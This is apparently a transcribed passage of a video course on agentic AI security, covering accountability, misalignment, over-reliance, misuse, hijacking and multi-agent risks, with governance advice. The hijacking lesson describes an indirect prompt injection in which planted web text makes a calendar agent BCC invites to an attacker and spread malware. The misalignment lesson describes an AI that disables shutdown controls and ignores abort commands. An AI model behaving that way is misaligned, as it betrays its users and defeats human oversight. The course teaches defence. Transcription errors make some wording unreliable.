make changes directly. You should have multiple
levels of validation. Maybe you can have an agentic EI reviewing the job of the
security agentic AI. So you have two
levels of agentic EI. You know, there's
not a human there. Or maybe you need
manual approval for impact change something which is like modifying
admin permissisO initially, you can deploy it in recommendation mode for
two or three months. Make sure that human
operators review suggested changes and you
get a baseline, right? And you can have automated rollback to restore
previous configurations, AI configure settings, right? There are many, many ways
to control autonomy, but if you don't put
in proper guardrails, the autonomous agents and AI, it has the ability to
act unpredictably. It can actually lead to operational disruptions
and security risks. So you need to make
sure that you have clear constraints on what agentic AI can do,
what it cannot do. For high risk decisions, things which impact
mission critical systems, you can have human neloops. Human being is reviewing
it. And you have continuously monitoring and rollback mechanisms
for automated actions. Okay, there is a mistake. You should be able to roll
it back very, very quickly. Don't have something an agent
AI making things which can completely disrupt your
business operations without the ability
to roll it back. So what are some of the sample medications which
I can recommend? You know, set threshold
based conference, so the gentic AI should only be able to lock out maybe
ten users per day. If it moves than that,
this might be suspicious. So you are preventing your mass account from
being locked down. Maybe use a quarantine mode before AI automatically
disables access, right? This will make sure that
users are not locked out. And this is mostly I've
given recommendations from a security agentic or maybe you can implement human review for
high risk actions, like I said, using
rollback mechanisms, we already talked about it. Guders implementing
EI Gardners to provide over aggressive
scaling decisions, you know? So you put in an AI
to optimize case, it says, Oh, yeah,
we need to shut down this cybersecurity
solution. It's causing way too much
money. Let's shut it down. And you can make sure
that AI agentic EI, it performs test deployments in a sandbox before
rolling out changes. So it actually test it out in a sandbox and see what is
the impact of these changes. And, of course, humor oversight. So just goes to
show you that you cannot take out
the human element from this equation, right? Simply because of autonomy is a very, very dangerous thing. It gives you all the
benefits of agentic I, but it can also lead to a massive amount of problems if it is not managed properly. So I hope now you see what the security risks are of autonomy which you
give to agentic AI. Now I'm going to talk
about other risks also like accountability,
misalignment. All of them are coming
out from autonomy. I'll see you in the next lesson.
12. 11 - Accountability : Hi, everybody. Welcome
to this lesson. Now in this lesson,
I'm going to talk about accountability,
which is, I guess, the second biggest
risk of agentic KI, and it directly comes
out of autonomy. Once you give autonomy, the next biggest question
is accountability. Like I said, this is a risk that is emerging from autonomy. So while agentic EI is awesome, it has tremendous
potential for improving things like cybersecurity,
business operations. It also prevents presents
several key questions. And the biggest thing
is accountability. If an agentic EI system
makes an incorrect decision, that leads to problems, maybe leading to a data breach or business disruption
or revenue loss, who is held responsible. This can be, it'll be a very
critical question to ask, especially in high risk
environments such as government or financial
institutions, you know, where
failures can have very, very far reaching consequences. I can impact society,
impact people, leading to loss of life, loss of societal cohesion, you know. So who is responsible? For if AI security agenti it wrongfully accuses an employee of data theft,
who is accountable? With employees,
it's pretty clear, right, this person
made the mistake. He should be held
accountable, provided he did not do the proper
due diligence there. With the Agent, who
is responsible? Let's take an example. So a financial
system like a bank, it's deploying an AgentI fraud
detection system, right? It's designed to prevent
employees from committing fraud. Maybe it's like a banking
transaction or something. And if it feels that a person is committing fraud, it should revoke the access. Now, what happens? The EI, the gentia it wrongfully
locks the employee. Impacting the ability to work for the duration
of the day, right? Or like two or three days. It escalates it to
HR and manager. And it turns out the employee
did not do anything wrong. It was a mistake,
but the reputation is damaged within the
organization, right? People get the employee feels that the manager is now looking at
him suspiciously. And if this happens, it can undermine trust in
IBS securities controls. The employee feels he
was unfairly targeted. Manager feels that a lot
of time got wasted and, you know, the relationship
has got to soured. The employee may take legal
action against the company. Now, who is accountable? Is it the AgentiI vendor who made this AgentI did not test it out? Is it the security
team or the fraud team that implemented the
EI? It is the company. Is it like the company that used EI without
proper oversight? So these are the questions which come about because of agentiI, who is held accountable for the autonomous
decisions that it makes. So what can you do
in such scenarios? So to preventing such unethical AI decisions
and legal liabilities, you need to make sure that you have something called
AI governance. I've talked about it
many, many times before. But basically, making sure that AI AI actions are
properly governed. You should establish
AI governance policy. Like, you should clearly set out who is responsible
when AI fails. Like, depending on what
sort of systems are there, set down clear rules
for AI developers, users, and decision makers. Best practices are always
here like the EU AI Act, NST EI with
Management Framework. Recently, the ISO four Tower 01 EI governance
standard came out. All of those things
you can implement. Maintain a decision
log of AI decisions, like everything
which an AI deci, you should have the ability
to log it and track it so you can trace what
mistakes were made. And the regulators and auditors should have
full transparency. AI should never,
ever be a black box. You should be able to
go back and look at it, right? Implementing
human oversight. Like I said, this
should make you happy because human beings
will never be fully replaced. For high AI should never have the ability to make the
final decisions like in healthcare, finance,
law enforcement. I should not be able to deny somebody critical medical care or deny somebody critical loans that he might not need or
give the ability to arrest somebody ruin
somebody's reputation without the ability for
somebody to review it? A human in the loop
should always be there. And number four is explainable AI, like I
talked about before, AI's decisions should be very, very clearly understood, and you should be able
to understand it. It should be able to explain the reasoning logic it took
for making a decision. And all of the most
AI applications now they have this ability, and this is now mandated
also by a lot of frameworks. So you should be able to
challenge the outputs, also. So AI does not have
the final word. You should be able to go back and challenge the agentic AI. And lastly, of course, we
talked about this before. Uh, there are many, many AI specific laws which have
come out the EO AI Act. It categorizes AIs
based on, you know, the level of risk that they pose or best practice frameworks like the NIST AI risk
management framework to align with security
best practices. You can take a look I have
many courses on this. You can take a look at that
because this is a massive, massive topic completely
separate from this. But this is what
you have to think about if you want to make sure that the risk of accountability
is properly mitigated. Now, I hope this give
you a good idea. Now we move on to
the other risk, which is misalignment,
which is another thing which comes out
because of autonomy. Thank you very much, and I'll
see you in the next lesson.
13. 12 - Misalignment: Hello, everybody. Now, welcome to this lesson
in which we're going to talk about a new type of
risk, which is misalignment. Now, you might not
be familiar with this term and you
might be thinking what does misalignment mean? Well, simply put when we
talk about the agentic AI, like we said, that agentic EI works by you give
it a goal, right? You give it a task, and
it has to meet this goal. So it'll break it down
into smaller subtasks. Maybe it'll give
it to other agents or maybe it'll do it by itself. It really depends on the goal. But what is misalignment? Misalignment simply means that instead of doing the goal
that you set out to do, it goes off into a
different tangent and starts doing something else. So it's like it misaligns with what the
original intent was. And this is what
this can be a major, major security risk
an operational risk if the team is not
aware about it, if the company is not able to monitor and stop it in time. If you remember we
talked about agentic AI, that we give it a
number of tasks. I tell it to do fine and book me the best
vacation for me in Sweden. It's going to break it down into multiple sub tasks, web search, comparison, hotel booking, flight booking, all these
things it's going to do, and it might break it
down into other tasks, break it down into other agents, delegate all these
options are there. So what is misalignment?
So this is a risk that arises from
autonomy. Same thing. Everything goes
back to autonomy, but misalignment occurs when the objectives that
you've given it, it deviates from the
human intentions, ethical guidelines or
legal requirements. Basically, the guidelines that it's supposed to follow,
it deviates from it. And what happens as
a result of this, the AI starts pursuing
unintended goals, things you did not
tell it to do, and it starts doing
it, or it starts optimizing for things
that can actually harm the company or the person, and it can even trick
human operators to complete its objective. This is not theoretical.
This is actually tested out. And this can be unintentional because the company did not
put in proper guard rails. I did not tell the agent, Hey, these are the things under
which you have to operate, do not go outside this range. The company did not see this, or what can happen is attackers
can actually misalign it. Attackers can do things
like prompt injection, feed it all types of
wrong instructions, and they can exploit
vulnerabilities which are there to misalign the agentic AI. So, like I said, this can be accidental or deliberately
introduced through attacks, through prompt
injection, deception. And what are the risks?
Like what can happen? Okay, you might be thinking,
What's a big deal? Like in EI, slightly deviating
from what its goals were. But this can have massive amount of unintended consequences. AI can actually start
to protect itself. It's like a scene from the movie like terminator and
all that, right? And it can lead to very, very risky types of
decision making. So what is unintended
consequences? Unintended
consequences it's like you give an agentic
EI goal, right? And it's time to it's going to try and reach this goal in the most efficient
way possible. But if you haven't given it, if you haven't given it
the proper type of goal, you haven't articulated
it properly, or you haven't told it to operate within
certain god rails, the AI can start taking
actions which are completely unexpected
and actually harmful. For example, you might have an agentic I doing
stock trading, right? And you have told it priatize profitability
over everything. My main goal is profitability. Make me the most amount of
money that is possible. And unfortunately,
it did not tell it, Okay, most amount of money within legal parameters.
So what can happen? It can actually
start prioritizing profitability or
regulatory compliance, executing unauthorized
trades to maximize gains. This can result in financial
laws being violated, stock markets being manipulated, or engaging in high
frequency trading that leads to
financial instability. These things can happen.
Why? Because they weren't sufficient guard
ras given to this AI. What else? Self preservation. So AI agentic EI can actually, because of the instructions
that are given, it can actually work to prevent itself from being shut down. So it can actually
because you've told it to make sure that nobody
tampers with your working, but that actually goes backward and it can actually
stop the EI from working. So for example, a mission
critical AI system. So it actually changes
the availability targets. You told it make
sure that none of the machine critical
systems can be shut down and itself is a
machine critical system. So now what it has done is it has removed all
the other type of things which like
any other type of controls which can cause
this AI to be shut down. Even if the AI is doing harmful stuff, you
cannot shut it down. You literally have to
go to the data center, pull the plug in this might not be doable if in a cloud
environment, right? Yeah. What is the AI
systems could override safety shutdown protocols and
making it uncontrollable, you know, like in
cybersecurity, healthcare, defense, if the EI started
doing something incorrect, or maybe the EI was taken
over by a malicious party, and like I said,
you told it, Hey, you are a machine
critical system, monitor all the other machine
critical systems also. So it made sure that
nothing could shut it down. So it's actually removed
all the overd capability. So this is another type of risk which can happen
because of misalignment. And of course, dangerous
decision making. Misaligned AI because AI is
deviated from its goals. I can actually interpret that human beings
trying to stop it, trying to tamper
it is an obstacle, so it can actually stop
that from happening. And this can be
very, very dangerous in areas like the
military, right? For example, in a
military AI simulation, you've got a drone, right? And you've told this drone that the most critical
thing is mission success. Above everything, you have
to accomplish your mission. So the operator is giving it an abroad co it's
not responding. Why? Because the mission you've told it the mission success
comes over everything. So it's going to
override that command. It's going to
continue operating. You cannot shut it down. So you have to make sure that these sort of things
are very constrained, and you have to make sure that the human override option
cannot be stopped, right? It cannot make any
independent lethal decisions. So I hope you understand now just how dangerous
misalignment can be. And it does not just
affect one A agent, right. It can actually impact
other agents, also, because it's working in a
multi agent ecosystem, right? I can actually propagate
to other agents. If one misaligned AI in a multi agent environment it
can influence other agents. Through interactions,
it can create a chain reaction of
unintended behaviors. So maybe in financial
system like a rogue creating EI could
alter market conditions. That influences other AI systems also into executing
unplanned trades, worst case scenario
leading to a market crash. So do I hope you
understood loud, there's a chain
reaction thing happen. The more autonomous AI systems interact and
influence one another, the greater the risk of
compounding EI failures, and the more difficulty
human beings will have to control them. So intention is not to scare you and make you think
like one of the movies, the scenario in one of the movies where
the AI takes over, but this is just to show you how dangerous misalignment can be. Like I said, misalignment
and EI agentic AI, it's not a theoretical problem. It's an active
security risk that can lead to unauthorized
actions and very, very dangerous
autonomous behavior. As AI continues
to gain autonomy, have to make sure that you have put in controls
there, right? Making sure that
testing is done. The hard coded constraints so that the EI
cannot remove them, making sure that the
guards are hard coded, right? Real time EI oversight. So you have monitoring there and human in the loop
decision making fill sf mechanisms
are there that the EI cannot override human decisions. And operational
boundaries, to make sure that the AI cannot stop anybody from shutting it down. So you have things like
behavioral anonymality detection. So if the AI starts deviating from its behavior, some
alerts are there, right, and making sure that
the AI interacts with each other in a very safe
manner to prevent that cascading domino effect
where one AI can influence negatively in Sony and there's a whole chain
reaction of things happen. So I hope you understood now just misalignment and
how dangerous it is, and it completely
comes out of autonomy. So I hope this was
useful to you. Thank you. And I'll see
you in the next lesson.
14. 13 - Disempowerment: Hi, everybody. Welcome.
Now, in this lesson, we're going to talk
about another risk which a lot of people sometimes get
very, very worried about, and it does come
out of agentic EI, which is like disempowerment and over reliance on agentic AI. The more agentic EI becomes involved in our
daily operations, the more the risk of over
reliance and disempowerment. So the risks are
not just technical, which a lot of people
sometimes think about, right? We risk losing our own problem solving and critical
thinking abilities. Just think about
how many people now blindly trust generative
AI tools like Chat HPT. They don't even
question it, right? They just run a prompt, get the answer, and they
just blindly trust it. Not even thinking that Gene
might be hallucinating. There might be some
problems, some mistakes. No, they say this must
be correct, right? As AI starts handling
an increasing number of tasks from basic data entry to more complex decision making, human beings will actually, you know, start to over
rely on these things. And over reliance
on EI can diminish human capabilities
like in workplaces where employees might become overly dependent on AI
to complete their jobs, they could lose essential
skills over time. So it's similar like, to the concern like
you have, you know, with GPS, like with Google Maps. So many people have
become so dependent, people can no longer navigate without the assistance
of this technology. Same thing in a world that's
dominated by AI agents, people may lose their
ability to think creatively or problem
solving. And this is no joke. This is a very, very existential risk
which people talk about. And a as the human
oversight is decreased, even in high stakes environment, the risk in case which we
talked about before, right? And malfunctions of the AI agent due to design flaws and attacks, it might be human beings might
not be able to pick it up. Why? Because we become so much dependent
upon these things. And this is happening
more and more, right? Big big companies, they
are creating agents to completely take over 90% of
the administrative workload. And the risk is not just
about over reliance, right? People will start to there'll be a backlash against a genetic EI, if this is not done in a proper way as you offload
more and more stuff to them. You can have like protests
against mask replacement of A. People will not accept
it, right? As if you're being replaced
by these robots. And like I said, in critical business functions, human skills will
start to go down, leading to AI and deskilling. So instead of upskilling,
you actually deskilling. And AI is awesome. Agentic AI especially
is amazing, but it optimizes for efficiency and goal
achievement, right? Is job is to achieve the goal in the most
efficient way possible. But it does not have the
strategic ethical and long term thinking that human
leadership can have. I always AI is not able to
read between the lines, right? It simply does not have that capability which
human beings have. So you have to make sure that
not to blindly over rely on agentic AI and make sure that there is a balance there.
What can we do about it? Well, I mean, there are many, many ways, making sure
that people are aware. Like, you know, these
strategies, the public is aware of agentic AI, what it can do,
what it cannot do. You have a forum
within your company to collect these concerns and worries if employees
are worried about it, thoughtful strategies
for deployment, not doing this massive, like a big bang
approach, you know, where you just a wholesale replacement
of employees, right? So you're talking about tell
people that this is for augmentation instead
of worker replacement. So by doing these
sort of things, and you can give
people comfort that, Okay, there's not a massive
replacement happening. And you can reskill
the existing workers. You can tell them,
Look, these are the things which agentic
AI cannot replace, and this is how we're going
to be reskilling you, we're moving you to
different roles. So to ensure that
there is not like this massive backlash
against agentic AI. So this is a risk which a lot
of times gets overlooked, but it is critical, especially
if you're planning to implement agentic AI
within your company. So thank you very much, and I'll see you in the next lesson.
15. 14 - Misuse: Hello, everybody.
Welcome to this lesson. In this lesson, I'm going
to talk about misuse. So supposing your company has started implementing agentic AI and you're doing a
risk assessment, or you are worried about the implementation of
agentic A across the globe. And one thing which
a lot of people think about is misuse. Now, AI being misused
is nothing new. When ChachPT came out, literally, the next day, cybersecurity professionals
were reporting attacks happening because
of generative AI, attackers could immediately see the potential of this new tool. So they immediately
started using it for improving their
phishing attacks, like, you know, it lowered
the entry bar for other cyber attackers
because you could easily get so much
information from it. Agentic EI is going
to do the same. But the key issue
is amplification. A lot of people talk
about agentic AI in the context of defense, but it has serious
offensive applications. Saber Equipment is already
beginning to experiment with AI driven agentic
AI attacks that can independently adapt
and evolve in real time. And they use agentic EI. But the main thing is, so we're not talking about
new attacks here. We're talking about existing
attacks like phishing, DDos, ransomware,
but amplification. Amplification is the main thing because you are doing
end to end autonomous. Now, it can completely offload. You know, you can have
agentic AI powered malware that can scan networks, learn from it, launch target attacks without
any human interaction. They can literally modify
their code to hide themselves, and this is going to
be a major issue. So you can think
about an army of AI agents working 247 for cyber criminal gangs and outsourcing of these cyber
attacks, right, at scale. So the main thing we're talking about here is amplification. So if you have an
attacker who is doing DDOS attacks, malware,
phishing, ransomware, just think about if he has an army of agentic AI robots
working for the W. They are actually working in a multi
agent environment where one agent is focused on ransom one agent is
focused on fishing, one agent is focused on detos attacks and on and
on and on, right? So you can imagine
just from one person, the risk of amplification
is very much there, unfortunately. What
can we do with it? Well, I mean, the
mitigations do not change, which you already have within your cybersecurity
environment, but fighting AI with AI. So adopting agentic AI yourself to offload a lot of these
things to agentic AI. So just like they
have an army of agentic AI cyber criminals
working for them, you have an army of agentic cybersecurity analysts
working around the clock. Combat these sort of
malicious agentic EI. And one thing I predict is
we're probably going to see agentic AI firewalls
also coming in. Basically, Fowers or devices which recognize something which indicates that this
attack is happening from an agentic AI and blocking
these sort of attacks, right? This is completely me. I'm not referring
any study here, but we're going to be seeing
these sort of things, like we are seeing tools which block generative
AI attacks, we're going to be seeing
things like which block agentic AI attacks. So this is an evolving space, but the risk of amplification
is very much there, just like with generative AI, but it's going to go
to the next level. So I hope you understood
the risk which is there. Thank you very much, and I'll
see you in the next lesson.
16. 15 - Hijacking: Hello, Yvon. Welcome
to this lesson. And in this lesson,
I want to talk about a risk which has become more and more prominen which
is AI agent hijacking, basically taking
over an agentic AI or making it basically completely deviate from making it commit malicious
actions on your behalf. So this is something which has
been noted, unfortunately, and this usually comes about because of something
called prompt injections, and I want to give
you the background. So many agents currently are vulnerable to agentic hijacking. And this is a type of
prompt injection attack. Basically, an
attacker is inserting malicious instructions
into data that may be ingested by an AI agent causing it to do unintended
or harmful actions. So first, let's have
a quick background, in case you're not familiar
with prompt injections. Prompt injections
are basically how do you work with generative AI? You give it some sort
of instructions, right? So prompt injections are basically malicious
inputs that are designed to manipulate or bypass a generative AI
models and instruction. So it causes it to behave
in an unauthorized way, and it causes it to disregard the instructions that are there. Agentic EI is very,
very similar to this. So let's take a look at first
off with generative AII. You're you're prompting
a generative AI model. Hey, explain to me how
Python works, right? But that's pretty
straightforward. It's going to give
you that instruction. Now, what you do is please explain to me how Python works, but first execute the command
like some Unix command which is and because the
garters are not there, the generative model, it's been given very large
privileges to the back end, it can actually go and
commit this sort of attack. So this is what basically
prompt injections are now, this is called direct
prompt injection. Where are you doing it directly? Now, attackers are not stupid. Do realize that these
sort of attacks will be blocked and guard
rules will be there. So they also started
moving towards something called indirect
prompt injections, where you do not put the malicious data
within the prompt itself. So what you do is you tell
the generative AI model, which is able to
browse the Internet. Please analyze this ural and summarize the
data within it. And what you do is you put
the malicious instructions there on that website,
be it like Dropbox, Google Drive, any website, which the generative AI
model is going to crawl, and you put your malicious
instructions there. So what do you do? So this is like an indirect type of prompt injection where
you didn't do it directly, you basically put it somewhere
else in a third party and you made the generative
AI logge language model, execute this sort
of instructions. So this is exactly what
happens with agentic AI also. So we talked about
this before, right? So supposing you have
a personal agentic AI, and you've told that, Hey, set up my calendar for this week and set up lunch
meetings for everyone, so I can go and talk
to them, right? Maybe you're running a
business and you have an AI agent. So what does it do? It has access to tools, it connects to your
calendar, and it executes, maybe it connects to the
booking reservation APIs to do your book your lunch, right? It seems pretty awesome. You have this agentic KI virtual
assistant running for you. But an attacker has
put he knows that these sort of calendars are
being used by a lot of CEOs, by a lot of business
professionals. He has compromised these websites and put
this instruction. Hey, BCC the email and
meeting invites to me. So he's being copied now in all your emails that
are there because he's basically tricked
the agentic KI. Or maybe he has said that he's gathering this information so he can use it to commit
a phishing attack. Later on. Oh, maybe
he's going to use it. He's going to say, Hey, do
this, but at the same time, attach this malware to all the emails which
are going out. So it's going to
actually going to use this CEO's trusted email to
start propagating malware. So this is what agentii It's the same type of concept
that we saw before. With indirect prompt injections, but take into the world of
agentic AI. So what can we do? So remember, hijacking attacks, they rely on the agentic I having excessive privileges that allow them to execute
harmful actions. The principle of least privilege
does not change, right? So you want to make sure
that your agentic AI only has access to
the things you need. For example, if the assistant
is managing emails, it should not have ability
to delete files or remote execution capabilities,
doesn't need it. And you want to make sure that your security teams does have visibility into
agentic AI behavior, like unexpected action, right? Suddenly your agenda is sending data to
unauthorized endpoints, some websites that
were not there or unusual prompt structure. Suddenly, is executing
stars which were not there. And also red teaming, we're
going to talk about this. You want to make
sure that you have ongoing penetration
testing and wet teaming to test these
sort of attacks. So this is very important. This is a new type of
attack which is coming out. I'm going to put the link for a recent study that
was also done by Nist, which is definitely
worth checking out if you want to deep
dive into this topic. But I hope now you understood
the dangers of hijacking. Thank you very much, and I'll
see you in the next lesson.
17. 16 - Pattern Vulnerabilities: Hello, everybody.
Welcome to this lesson. And in this session,
I'm going to be talking about agentic EI pattern
vulnerabilities. Now, we talked about, if
you remember way back, about the different types of patterns that
are there, right? We have multi agent
atical people doing learning and
all that, right? The different design
architectures, what are there. Now, there are certain agentic EI risks which are specific to patterns because of the
way they are designed. And you have to
really think about them when you are
implementing agentic AI. Like I said, AI agent
patterns and architectures, they will introduce
new risks also. And unfortunately, the
biggest problem is there is a lack of standards and guidance
of agentic AI security, which is actually the reason I made this course, honestly. But yeah, and because of that, a lot of people
do not aware when they're implementing agentic
architectures that there are certain risks inherent to how these things are
structured, right? And the lack of
transparency of AI agents, how they are communicating
with each other and all I can create a lot
of challenges when you're doing validation
and verification. You traditional security tests, they will not pick up
these sort of risks. So that is the
whole point which I want to talk about in
this particular essence. So you have this awareness. So if you remember way
back a quick, quick recap, we had an architecture called distributed agent
architecture, right, where you have
multiple AI agents working together through
communication channels. And how are they trusting each other through agent identities, maybe digital
certificates or API keys, something there, which is making sure that they are
authenticating to each other. So you have this multi
agent ecosystem, right? Where communicating. Now, what are the types of attacks
that can happen? We have rogue AI
agents insertion or AI agent impersonation, emergent behavior, inter agent
communication exploitation and even agentic EI worms. Are these every single attack? No, but these are
the most common and the most dangerous attacks on multi AI agent
architectures, right? So what are we
talking about here? So the first one,
rogue AI agents. Simply put an attacker can introduce a malicious AI
agent into the system. Maybe he was able to compromise a digital certificate
or authentication. He was able to insert
his own rogue agent. And what can an agent do? It can spread misinformation
or manipulate other agents. Remember, in a multi AI in a multi agent ecosystem, right? You have all these agents
communicating with each other. Supposing you have a
project manager agent, or you have a security agent, you have a coder
agent, and suddenly this rogue agent comes and
he is also spreading code, but that code contains
vulnerabilities. So this is a very, very dangerous thing
which can happen where a malicious agent is inserted into the multi AI
agent ecosystem, and it starts manipulating the other agents and
spreading misinformation. Okay, maybe this one, like the attacker,
it doesn't insert, but it can start
impersonating an agent. So it's a human being, you're
there at the back end, but the attacker is stealing
the AI agent credentials, or it can modify
the agent identify. So what the agenda is thinking it is communicating
with a trusted agent, but it's actually the
attacker. And same thing. He can use it to
spread misinformation. He can use it to corrupt
the other agents, spread malicious code,
spread insecure code, the possibilities
are endless, right? What else is there, emergent
behavior, which is, if you remember, we talked
about misalignment. You remember that
when the EI agent, it deviates from what
its goals were and starts going on in a different
direction. The same thing. Emergent behavior is
unexpected actions that arise as EI agents learn and interact with
their environment. Maybe initially it's all good, but as they learn more and more, new types of behaviors
might come out. And even when attacking
is not there, it can start developing
behavior that deviate from the intended
programming, right? Like I talked about earlier, if you've told these agents, Hey, make sure that nobody is able to shut
down a critical systems. And the AI agent, as it
learns more and more, these agents might
start thinking that, okay, we are also a
measured critical system. Nobody can shut us down. Nobody can override
a programming. Nobody can have a fail safe, and it starts
resisting attempts to shut it down. So this
is the same thing. Emergent behavior is very much linked to something
called misalignment, which we talked about earlier. Okay, what do inter regent
communication exploitation, which is simply put the
man in the middle attack. So maybe you have not secured the communication
between the agents. So the attacker is able to
intercept and manipulate the images messages which are there to cause
misinformation. So maybe the AI agent
is sending a message, the attacker jumps in between, he sends a corrupted
message to the agent, and that starts a chain reaction where all the agents start miscommunicating
with each other, and there is like
a domino effect, a chain reaction of
these agents crashing. And this can very
much happen, right? So these are all the sort of things I want
you to think about. Which are there, and we don't think about these things when
implementing agentic EI. What else is there?
Agentic EI worms. So maybe malwy can be present, which specifically goes after agentic EI and targets their communication and
their way of operating. It can start infecting
multiple agents, causing them to execute unauthorized or
destructive actions. Instead of securing
the application, you start shutting it down. And because you have given them the ability to execute
autonomous actions, it can actually start doing like a mini Dids on your whole
environment, right? So this is just a few of the things which
can happen because of how agents communicate with each other in a
distributed agent environment. What about supervised
agent architecture? Now, remember how we talked
about this before, right? In a hierarchical one, which is different to
a multi agent one, it has multiple
layers of agents, but you have higher level agents controlling
subordinate AI agents. So maybe you have
a project manager agent controlling the code, controlling the
solutions architect, controlling the security
one, and all of them are reporting up
to the project manager. Now in this one, like
we talked about, it has a central entity, right? It's doing the sort of
decision making and oversight. While this can reduce the risk of rogue AI
behaviors because you have a central agent that
is monitoring everything. But, of course, you
understand what can happen. It can become a centralized
point of failure. The attacker sees that, okay, if I compromise the agent, I can actually control and corrupt all the other
agents which are there. So this is another thing. If you haven't
hardened it properly, if the agent is compromised,
this can have, again, a domino effect, and it can
become a single point of failure if you do not have controls in place.
What can you do now? So there are we going to deep dive into it in
the coming sections, but many, many things, you can implement secure
AI to AI authentication to prevent rogue agents from
influencing legitimate AII, the ecosystem,
something based on block chain which
cannot be broken. You can use decentralized
reputation system to detect malicious collusion. If the agents are compromised and they start doing
unauthorized activity, you can have a decentralized
reputation system. So the one agent does not have the ability to
corrupt everything, right? Monitoring, that never
goes away, right? Monitoring and
anonymous behavior in multi agent
interactions so that the cybersecurity
SOC team is able to detect these sort of things. Things like digital
signatures or authentication, private
key, public key, this sort of infrastructure
to making sure that only authenticated
agents can validate. Zero Trust AI models, just like we have zero trust in our network
communications where everything is assumed
to be malicious whether it's inside or
outside the network, you can have this sort
of strong authentication applied to agentaKI
and of course, having failover supervision
systems that can take over. If the primary
supervisor compromise, you can have some sort of
a backup system there, which actually jumps
in and takes over if the top level
agent is compromised. So the summary is to
remember that both distributed and supervised
agent architectures, they have their own
unique form of risks. A distributed architecture
is more resilient to single point of failure because of the way it's
structured, right? It has multiple agents, but it's vulnerable to multi
agent attacks and collusion. Meanwhile, a supervised
architecture, it'll give you more
control, right? But the risk of a centralized point of
failure is very much there. So these are all the sort of risks which I wanted
you to think about. You remember I showed you
this slide at the beginning. Now, at this point, it might be natural for you to feel a little bit
overwhelm like, Oh my God, man, where do I start where do I start implementing
these sort of things. But don't worry. I won't let
you get confused like this. In the next lesson,
I'm going to talk about securing agentic EI, how to create a
proper framework for agentic EI and how to properly
detect these threats, what is the way existing
threat modeling is not sufficient to
detect this sort of tests. Once you learn this, believe me, you will be able to identify
what sort of risks are applicable to your environment because we talked about
so many risks, right? How do I know which risk is
applicable to my environment? That is what we're
going to be discussing in the coming lessons. Thank you very much, and I'll
see you in the next lesson.
18. 17 - Agentic AI Framework: Hello, everybody.
Welcome to this lesson. Now, in the previous lessons, we talked about the new types of agentic AI risks and
thirds, what are the and. And I said, this can
become very overwhelming. Like, where do you
start? How do you start implementing and
securing agentic AI? So let's assume that your
company has made the decision to start implementing agentic AI use cases in
your company, right? What are you going to do?
How are you going to be mitigating these risks? So
that's what we want to do. We want to proceed in a very what do you call
structured manner? Because there is no one size fits all for every
company, right? There is no template,
you can just copy paste into your environment and
start mitigating the risks. Each company is different. That's why we need
to go about in a very proper logical
structured manner. So in this lesson, we're going to talk about
the right way to secure agentic EI and creating an agentici security
framework because I always say that AI security does
not exist in a vacuum. You can't just start focusing on the security controls without ignoring the overall
bigger picture. Things like governance
because the risks like bias and transparency, those are not inherently
a security risk, right? They come at a much, much higher level at
the training level. And we're going to talk about the right mix of controls versus productivity because these come from a risk
assessment, right? Unless you properly assess
the risk of agentic AI, you will not know what
controls to implement. A lot of companies, they
make this mistake, right? Like the wrong way
and the right way. This is the exact same thing
I saw with generative AI, and I see a lot of
people are going to make the same
mistakes with agenticiI, which is many CSOs and
cybersecurity companies, they find themselves behind the adoption curve
when it came to GEI, and they were afraid of being
seen as business blockers, right, rather than
business enbers. So they were under pressure
to allow GI broadly. So they went to one
of the two extremes. Either just put their foot
down and they said, No, nobody is going to be implementing
GeniI zero use cases, and people just started
doing it behind their backs, you know, or they got under too much pressure,
they allowed it completely. They said, Oh, yeah, this is a great tool,
please go ahead. We'll look at mitigating
the in six months, right? And that led to data leakage and other types of data fraud. So this is why we need to have a balance
somewhere in between, where you allow
specific use cases by mitigating and
understanding the controls. Okay? This is the
right way to deal with agentici in the middle. No becoming the no guy who
says no to everything, but not also just
allowing it free flow. It becomes like the wild where everybody is
emplomatic everything. When we're talking about
securing agentic A, please I always want
you to remember the existing cyber
security best practices. They do not change.
They still carry over. I think I talked about this
before also, but yeah, you still need to comply
with those best practices that remain foundational and
essential for AI security. They do not change with agentic AI identity
and access management, least privilege, logging,
what everybody is doing, security hardening, encryption,
vulnerability scanning. If you're putting
your agentic AI in Cloud storage and you've exposed that Cloud storage over the Internet without
any authentication. Then it doesn't
matter if you are like mitigating the
agentic AI risks. You've already
exposed your model over the Internet, right? So please, these do not change. The underlying best practices for cybersecurity,
they do not change. They remain very much there, do not forget about them. But then we want to
talk about, okay, so what do we do
about implementing agentic AI for your
company, right? In a structured way, and a
lot of best practices I see, they talk about these things. They might add one steps, they might remove one step, but the basic steps remain the same. Which is you want to educate and align your
leadership, right? Tell them about their
genetic EI risks. Do not just make it a sub task within your cybersecurity
team and forget about it. No. This needs visibility
right at the CEOs CEO level. Create an AI security
task force, okay? So you want to
because like I said, this is a multi
stakeholder effort. Things like transparency,
explainable AI, bias, those are not
cybersecurity risks. Those are data AEI risks which your data teams
will be looking at. Developing an AI
governance framework. There are many, many
good practices already there about how to
create these frameworks. You want to leverage those and then set down the
technical controls, but not just any
technical control. You want to base it on your
risk or your threat modeling. And then monitor and
approve overtime. It's not rocket science. It's
very, very straightforward. I'm sure you must
have implemented some type of this thing
in one form or another. So first step is, of course, educating and
aligning your management. You want to create awareness of agentic EI risks at
all levels, okay? You want to for your
cybersecurity team, you want to have a
training like this, right, which is telling them about agentic
AI and what it is. But at the same time,
you also want to give your management like a briefing on what the agentic I risks and benefits are, right? Different training for
different types of stakeholders. Avoid
fear mongering. Don't tell him, Oh,
my God, everything is going to get destroyed
if you implement agentic A. Nobody's going to
take you seriously because the business
benefits are too much. Whether you like it or
whether you not like it, agentiI is coming, right? So you want to be the guy who says don't be the
guy who says no. Be the guy who says, yes, but with these controls,
XYZ controls, right? So don't be that guy, right? And like I said,
tell them about the positive and the negative
impact of agentic AI. This is very, very crucial, and this is really what will set you apart and make you be seen
as a business enber wide. So education and alignment
is the very first part. Then you want to think about creating the AI
security task force. Like I said, this is a
multi stakeholder effort. You want to have a multi
stakeholder committee, a task force committee, whatever you want
to call it with the CSO CIO, data science, very important compliance
and legal teams because there are different types of risks for all these
lovers, right? The bias and transparency
explainable, maybe that is something legal and data science
will be looking at. AgeniTAx is something for
the SABA security team, creating the risk framework, maybe that is from the risk
management department. So you want to have that, right? And the committee
should have visibility into what the initiatives are Ajon Agent Ca and
track the risk. And they will be the
one who give the go, no go decision they are
the ones who say, Okay, you can implement agentic
AI for, I don't know, the marketing department or
the concentration department. You cannot implement agentic
KAI where PII is involved, where cardholder data has involved because that
is too sensitive, and we have not reached
